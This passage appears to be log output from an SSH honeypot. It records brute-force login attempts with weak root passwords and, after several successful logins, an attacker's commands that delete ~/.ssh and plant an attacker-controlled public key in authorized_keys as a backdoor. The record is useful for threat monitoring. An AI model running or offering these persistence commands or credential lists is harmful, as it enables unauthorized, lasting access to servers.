"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: readonly
{
"id": "2f9b7437b4bd",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:22:33.954494Z",
"end_time": "2026-05-15T12:22:36.056571Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "readonly",
"pass": "readonly"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "df5ec853c960",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:21:12.533391Z",
"end_time": "2026-05-15T12:21:13.604582Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "a9caf1ca1860",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:21:10.342196Z",
"end_time": "2026-05-15T12:21:12.365173Z",
"duration": "2.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Admin@123!@#
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "2bf165ec0881",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:21:08.053586Z",
"end_time": "2026-05-15T12:21:13.601560Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Admin@123!@#"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: warnight
{
"id": "fa911c64c743",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:19:35.590182Z",
"end_time": "2026-05-15T12:19:37.660571Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "warnight",
"pass": "warnight"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: warnight
{
"id": "e1b2d366ee19",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:18:25.805848Z",
"end_time": "2026-05-15T12:18:27.115014Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "warnight",
"pass": "warnight"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "5d839c9271a7",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:18:15.948534Z",
"end_time": "2026-05-15T12:18:17.018796Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "7aa33365abeb",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:18:13.714449Z",
"end_time": "2026-05-15T12:18:15.779769Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Abcd123@
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "fa50072c7878",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:18:11.487823Z",
"end_time": "2026-05-15T12:18:17.015483Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Abcd123@"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}